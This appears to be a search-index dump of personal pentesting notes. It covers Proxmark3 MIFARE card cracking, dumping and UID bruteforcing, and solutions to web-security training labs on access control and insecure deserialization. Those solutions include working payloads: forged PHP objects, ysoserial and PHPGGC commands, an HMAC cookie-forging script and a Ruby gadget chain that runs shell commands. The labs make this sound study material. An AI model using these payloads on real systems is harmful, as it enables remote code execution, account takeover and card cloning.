                            # Check all sectors, all keys, 1K, and write to file\nhf mf chk --1k --dump             \n\n# Check for default keys:\nhf mf chk --1k -f mfc_default_keys\n\n# Check dictionary against block 0, key A\nhf mf chk -a --tblk 0 -f mfc_default_keys.dic       \n\n# Run autopwn, to extract all keys and backup a MIFARE Classic tag\nhf mf autopwn\n\n\nhf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n\n# Dump MIFARE Classic card contents:\nhf mf dump\nhf mf dump --1k -k hf-mf-A29558E4-key.bin -f hf-mf-A29558E4-dump.bin\n\n\n# Write to MIFARE Classic block:\nhf mf wrbl --blk 0 -k FFFFFFFFFFFF -d d3a2859f6b880400c801002000000016\n\n\n# Bruteforce MIFARE Classic card numbers from 11223344 to 11223346:\nscript run hf_mf_uidbruteforce -s 0x11223344 -e 0x11223346 -t 1000 -x mfc\n\n# Bruteforce MIFARE Ultralight EV1 card numbers from 11223344556677 to 11223344556679\nscript run hf_mf_uidbruteforce -s 0x11223344556677 -e 0x11223344556679 -t 1000 -x mfu\n
                            ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#next-steps","title":"Next steps","text":"
                            • https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md
                            • https://github.com/Proxmark/proxmark3/wiki/Generic-ISO14443-Ops
                            • https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets
                            ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/rfid/","title":"RFID","text":"

                            The RFID reader continuously sends radio waves. When a tag is in range, it sends its feedback signal back to the reader.

                            There are three basic types of RFID frequencies:

                            • Low Frequency (LF): 125 kHz or 134 kHz, range 8-10 cm
                            • High Frequency (HF): 13.56 MHz, range approx. 1 m
                            • Ultra High Frequency (UHF): 860-960 MHz, range 10-15 m
                            ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#quick-overview-of-arduino","title":"Quick Overview of Arduino","text":"
                            • Arduino is open-source hardware
                            • A single board with a microcontroller (ATmega328P)
                            • Different modules and sensors can be attached
                            • There are different versions of Arduino

                            Download Arduino IDE.

                            ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#requirements","title":"Requirements","text":"

                            RFID cards we need:

                            • Mifare Classic cards (1K, 4K, EV1): the UID is not changeable.
                            • Magic cards: the UID is changeable.

                            For programming Mifare cards we will use:

                            • ACR122u
                            • MFRC522 with STM8
                            • USB to TTL
                            • STM8 & STM32 USB
                            • Jumper wires (female to female)

                            More tools required:

                            • Arduino UNO
                            • RC522 Module
                            • OLED 4 Pin
                            • Breadboard
                            • Jumper wires
                            • Buzzer
                            ","tags":["pentesting","RFID"]},{"location":"burpsuite/burpsuite-broken-access-control/","title":"BurpSuite Labs - Broken access control vulnerabilities","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality","title":"Unprotected admin functionality","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation","title":"Enunciation","text":"

                            This lab has an unprotected admin panel.

                            Solve the lab by deleting the user\u00a0carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution","title":"Solution","text":"

                            See the robots.txt page, which discloses the admin panel path. Enter the admin panel URL in the browser and delete the user carlos.
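
                            A quick way to check it from the terminal (a sketch; the lab hostname is a placeholder):

                            curl https://LAB-ID.web-security-academy.net/robots.txt\n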

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality-with-unpredictable-url","title":"Unprotected admin functionality with unpredictable URL","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_1","title":"Enunciation","text":"

                            This lab has an unprotected admin panel. It's located at an unpredictable location, but the location is disclosed somewhere in the application.

                            Solve the lab by accessing the admin panel, and using it to delete the user\u00a0carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_1","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-controlled-by-request-parameter","title":"User role controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_2","title":"Enunciation","text":"

                            This lab has an admin panel at\u00a0/admin, which identifies administrators using a forgeable cookie.

                            Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-can-be-modified-in-user-profile","title":"User role can be modified in user profile","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_3","title":"Enunciation","text":"

                            This lab has an admin panel at\u00a0/admin. It's only accessible to logged-in users with a\u00a0roleid\u00a0of 2.

                            Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#url-based-access-control-can-be-circumvented","title":"URL-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_4","title":"Enunciation","text":"

                            This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.

                            To solve the lab, access the admin panel and delete the user carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_4","title":"Solution","text":"

                            Supply the blocked path via the X-Original-URL header. You will see a 302 and, following the redirection, a 403, BUT refresh the lab page and you will see that the lab was successfully solved.
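
                            A minimal sketch of the bypass request (the /admin/delete?username=carlos endpoint matches the other labs on this page; the lab hostname is a placeholder):

                            curl -i 'https://LAB-ID.web-security-academy.net/?username=carlos' -H 'X-Original-URL: /admin/delete'\n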

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#method-based-access-control-can-be-circumvented","title":"Method-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_5","title":"Enunciation","text":"

                            This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

                            To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter","title":"User ID controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_6","title":"Enunciation","text":"

                            This lab has a horizontal privilege escalation vulnerability on the user account page.

                            To solve the lab, obtain the API key for the user\u00a0carlos\u00a0and submit it as the solution.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-unpredictable-user-ids","title":"User ID controlled by request parameter, with unpredictable user IDs","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_7","title":"Enunciation","text":"

                            This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs.

                            To solve the lab, find the GUID for carlos, then submit his API key as the solution.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-data-leakage-in-redirect","title":"User ID controlled by request parameter with data leakage in redirect","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_8","title":"Enunciation","text":"

                            This lab contains an access control vulnerability where sensitive information is leaked in the body of a redirect response.

                            To solve the lab, obtain the API key for the user carlos and submit it as the solution.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_8","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-password-disclosure","title":"User ID controlled by request parameter with password disclosure","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_9","title":"Enunciation","text":"

                            This lab has a user account page that contains the current user's existing password, prefilled in a masked input.

                            To solve the lab, retrieve the administrator's password, then use it to delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_9","title":"Solution","text":"

                            Change the id parameter of the /my-account request to administrator to read the administrator's prefilled password from the masked input. Then log in as administrator, go to the admin panel, and delete carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#insecure-direct-object-references","title":"Insecure direct object references","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_10","title":"Enunciation","text":"

                            This lab stores user chat logs directly on the server's file system, and retrieves them using static URLs.

                            Solve the lab by finding the password for the user carlos, and logging into their account.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_10","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#multi-step-process-with-no-access-control-on-one-step","title":"Multi-step process with no access control on one step","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_11","title":"Enunciation","text":"

                            This lab has an admin panel with a flawed multi-step process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

                            To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_11","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#referer-based-access-control","title":"Referer-based access control","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_12","title":"Enunciation","text":"

                            This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

                            To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_12","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-insecure-deserialization/","title":"BurpSuite Labs - Insecure deserialization","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-objects","title":"Modifying serialized objects","text":"

                            APPRENTICE Modifying serialized objects

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution","title":"Solution","text":"
                            # Burp solution\n\n1. Log in using your own credentials. Notice that the post-login `GET /my-account` request contains a session cookie that appears to be URL and Base64-encoded.\n2. Use Burp's Inspector panel to study the request in its decoded form. Notice that the cookie is in fact a serialized PHP object. The `admin` attribute contains `b:0`, indicating the boolean value `false`. Send this request to Burp Repeater.\n3. In Burp Repeater, use the Inspector to examine the cookie again and change the value of the `admin` attribute to `b:1`. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have accessed the page with admin privileges.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
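
                            For illustration, the admin flip in the decoded cookie looks something like this (the surrounding attribute layout is an assumption; only the admin attribute matters):

                            # Before: b:0 is boolean false (regular user)\nO:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:5:\"admin\";b:0;}\n\n# After: b:1 is boolean true (admin)\nO:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:5:\"admin\";b:1;}\n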
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-data-types","title":"Modifying serialized data types","text":"

                            PRACTITIONER Modifying serialized data types

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_1","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_1","title":"Solution","text":"

                            Capture the session cookie of the regular user wiener:peter. Send a request containing the cookie to the Repeater module. Use the Inspector to modify the value of the cookie:

                            Original values:

                            O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

                            Crafted values:

                            O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}\n

                            What we did:

                            • Update the length of the username attribute to 13.
                            • Change the username to administrator.
                            • Change the access token to the integer 0. As this is no longer a string, you also need to remove the double-quotes surrounding the value.
                            • Update the data type label for the access token by replacing s with i.

                            # Burp solution\n1. Log in using your own credentials. In Burp, open the post-login `GET /my-account` request and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater.\n2. In Burp Repeater, use the Inspector panel to modify the session cookie as follows:\n\n    - Update the length of the `username` attribute to `13`.\n    - Change the username to `administrator`.\n    - Change the access token to the integer `0`. As this is no longer a string, you also need to remove the double-quotes surrounding the value.\n    - Update the data type label for the access token by replacing `s` with `i`.\n\n    The result should look like this:\n\n    `O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}`\n3. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have successfully accessed the page as the `administrator` user.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#using-application-functionality-to-exploit-insecure-deserialization","title":"Using application functionality to exploit insecure deserialization","text":"

                            PRACTITIONER Using application functionality to exploit insecure deserialization

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_2","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            You also have access to a backup account: gregg:rosebud

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_2","title":"Solution","text":"

                            In the user profile there is a DELETE feature that allows users to delete their profile. When doing so, the application relies on the path provided in the session cookie (which is part of the user object) to remove the avatar.

                            The exploit consists of changing that path to a file we want to remove and updating the string length of the path.

                            # Burp solution\n1. Log in to your own account. On the \"My account\" page, notice the option to delete your account by sending a `POST` request to `/my-account/delete`.\n2. Send a request containing a session cookie to Burp Repeater.\n3. In Burp Repeater, study the session cookie using the Inspector panel. Notice that the serialized object has an `avatar_link` attribute, which contains the file path to your avatar.\n4. Edit the serialized data so that the `avatar_link` points to `/home/carlos/morale.txt`. Remember to update the length indicator. The modified attribute should look like this:\n\n    `s:11:\"avatar_link\";s:23:\"/home/carlos/morale.txt\"`\n5. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n6. Change the request line to `POST /my-account/delete` and send the request. Your account will be deleted, along with Carlos's `morale.txt` file.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#arbitrary-object-injection-in-php","title":"Arbitrary object injection in PHP","text":"

                            PRACTITIONER Arbitrary object injection in PHP

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_3","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos's home directory. You will need to obtain source code access to solve this lab.

                            You can log in to your own account using the following credentials: wiener:peter

                            You can sometimes read source code by appending a tilde (~) to a filename to retrieve an editor-generated backup file.

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_3","title":"Solution","text":"

                            Review the code and notice CustomTemplate.php.

                            Read the file by appending a tilde (~) to its name and find an interesting method:

                            The session cookie consists of a serialized object.

                            We will craft a serialized object that triggers the interesting method in CustomTemplate.php and pass it Base64-encoded via the Inspector panel:

                            O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}\n
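
                            To produce the cookie value, Base64-encode the object and then URL-encode it in Burp; a shell sketch of the encoding step:

                            echo -n 'O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}' | base64 -w 0\n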

                            Run the request!

                            # Burp solution\n1. Log in to your own account and notice the session cookie contains a serialized PHP object.\n2. From the site map, notice that the website references the file `/libs/CustomTemplate.php`. Right-click on the file and select \"Send to Repeater\".\n3. In Burp Repeater, notice that you can read the source code by appending a tilde (`~`) to the filename in the request line.\n4. In the source code, notice the `CustomTemplate` class contains the `__destruct()` magic method. This will invoke the `unlink()` method on the `lock_file_path` attribute, which will delete the file on this path.\n5. In Burp Decoder, use the correct syntax for serialized PHP data to create a `CustomTemplate` object with the `lock_file_path` attribute set to `/home/carlos/morale.txt`. Make sure to use the correct data type labels and length indicators. The final object should look like this:\n\n    `O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}`\n6. Base64 and URL-encode this object and save it to your clipboard.\n7. Send a request containing the session cookie to Burp Repeater.\n8. In Burp Repeater, replace the session cookie with the modified one in your clipboard.\n9. Send the request. The `__destruct()` magic method is automatically invoked and will delete Carlos's file.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-java-deserialization-with-apache-commons","title":"Exploiting Java deserialization with Apache Commons","text":"

                            PRACTITIONER Exploiting Java deserialization with Apache Commons

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_4","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and loads the Apache Commons Collections library. Although you don't have source code access, you can still exploit this lab using pre-built gadget chains.

                            To solve the lab, use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_4","title":"Solution","text":"

                            Install the following two extensions in Burp Suite: Java Deserialization Scanner and Java Serial Killer. With those, when browsing the site, the live audit will show us deserialization issues:

                            In the Burp Suite scanner, see the issues already identified.

                            Paste the vulnerable request in Deserialization Scanner > Manual testing:

                            Click on All issues and you can identify a disclosed vulnerability in the Apache Commons Collections 4 library. This will help in the following steps.

                            Now we can craft a payload using the ysoserial tool (see debugging and installation there).

                            As we have Java version 11, our payload will be:

                            java -jar ysoserial-all.jar CommonsCollections4 \"rm /home/carlos/morale.txt\" | base64 -w 0 > test.txt\n\n# -w 0 : disables line wrapping in the Base64 output\n

                            Now we copy-paste that value into the session cookie, select it, and press Ctrl+U to URL-encode the key characters. Then we send the request.

                            # Burp solution\n\n1. Log in to your own account and observe that the session cookie contains a serialized Java object. Send a request containing your session cookie to Burp Repeater.\n2. Download the \"ysoserial\" tool and execute the following command. This generates a Base64-encoded serialized object containing your payload:\n\n    - In Java versions 16 and above:\n\n        `java -jar ysoserial-all.jar \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\ --add-opens=java.base/java.net=ALL-UNNAMED \\ --add-opens=java.base/java.util=ALL-UNNAMED \\ CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n    - In Java versions 15 and below:\n\n        `java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n3. In Burp Repeater, replace your session cookie with the malicious one you just created. Select the entire cookie and then URL-encode it.\n4. Send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-php-deserialization-with-a-pre-built-gadget-chain","title":"Exploiting PHP deserialization with a pre-built gadget chain","text":"

                            PRACTITIONER Exploiting PHP deserialization with a pre-built gadget chain

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_5","title":"Enunciation","text":"

                            This lab has a serialization-based session mechanism that uses a signed cookie. It also uses a common PHP framework. Although you don't have source code access, you can still exploit this lab's insecure deserialization using pre-built gadget chains.

                            To solve the lab, identify the target framework then use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, work out how to generate a valid signed cookie containing your malicious object. Finally, pass this into the website to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_5","title":"Solution","text":"

                            1. The cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.

                            2. Changing the cookie to a fake value will expose the Symfony 4.3.6 PHP framework.

                            3. Also have a look at the SECRET_KEY revealed at the URL disclosed in a developer comment (/cgi-bin/phpinfo.php).

                            4. PHPGGC has a gadget chain for that framework.

                            5. Create your payload with:

                            ./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n

                            6. Construct a valid cookie containing this malicious object and sign it correctly using the secret key. Using this template:

                            <?php \n$object = \"OBJECT-GENERATED-BY-PHPGGC\"; \n$secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; \n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); \necho $cookie;\n

                            Generate a file lab.php customizing the script. Use the $secretKey obtained in step 3. Use the payload generated in step 5 for the $object.

                            <?php\n$object = \"Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRh>\n$secretKey = \"cvb2w284adozzw3m2wgbhmxn7ezi9s4v\";\n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}');\necho $cookie;\n

                            7. Add permissions and run it:

                            chmod +x lab.php\nphp lab.php\n

                            8. Place the generated cookie in the session cookie in Repeater and send the request.

                            # Burp solution\n1. Log in and send a request containing your session cookie to Burp Repeater. Highlight the cookie and look at the **Inspector** panel.\n2. Notice that the cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.\n3. Copy the decoded cookie from the **Inspector** and paste it into Decoder.\n4. In Decoder, highlight the token and then select **Decode as > Base64**. Notice that the token is actually a serialized PHP object.\n5. In Burp Repeater, observe that if you try sending a request with a modified cookie, an exception is raised because the digital signature no longer matches. However, you should notice that:\n    - A developer comment discloses the location of a debug file at `/cgi-bin/phpinfo.php`.\n    - The error message reveals that the website is using the Symfony 4.3.6 framework.\n6. Request the `/cgi-bin/phpinfo.php` file in Burp Repeater and observe that it leaks some key information about the website, including the `SECRET_KEY` environment variable. Save this key; you'll need it to sign your exploit later.\n7. Download the \"PHPGGC\" tool and execute the following command:\n\n    `./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64`\n\n    This will generate a Base64-encoded serialized object that exploits an RCE gadget chain in Symfony to delete Carlos's `morale.txt` file.\n\n8. You now need to construct a valid cookie containing this malicious object and sign it correctly using the secret key you obtained earlier. You can use the following PHP script to do this. Before running the script, you just need to make the following changes:\n\n    - Assign the object you generated in PHPGGC to the `$object` variable.\n    - Assign the secret key that you copied from the `phpinfo.php` file to the `$secretKey` variable.\n\n    `<?php $object = \"OBJECT-GENERATED-BY-PHPGGC\"; $secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; $cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); echo $cookie;`\n\n    This will output a valid, signed cookie to the console.\n\n9. In Burp Repeater, replace your session cookie with the malicious one you just created, then send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-ruby-deserialization-using-a-documented-gadget-chain","title":"Exploiting Ruby deserialization using a documented gadget chain","text":"

                            PRACTITIONER Exploiting Ruby deserialization using a documented gadget chain

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_6","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and the Ruby on Rails framework. There are documented exploits that enable remote code execution via a gadget chain in this framework.

                            To solve the lab, find a documented exploit and adapt it to create a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_6","title":"Solution","text":"

                            1. Provoke an error message to disclose the library performing deserialization of the session cookie:

                            2. Find a documented vulnerability for that library at https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

                            3. Copy the original script:

                            # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"id\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs payload.inspect\nputs Marshal.load(payload)\n

                            4. And modify it:

                            # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"rm /home/carlos/morale.txt\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs Base64.encode64(payload)\n

                            Changes made:

                            • Changed the last two lines to puts Base64.encode64(payload).
                            • Changed the line rs.instance_variable_set('@git_set', \"id\") to inject the payload: rs.instance_variable_set('@git_set', \"rm /home/carlos/morale.txt\").

                            5. Run it. You can use https://onecompiler.com/ruby/

                            6. Paste the generated payload into the session cookie in Repeater and send the request.

